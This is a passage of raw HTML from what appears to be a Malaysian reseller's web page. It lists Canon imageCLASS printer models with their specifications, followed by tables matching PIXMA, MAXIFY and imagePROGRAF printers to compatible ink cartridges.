srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td 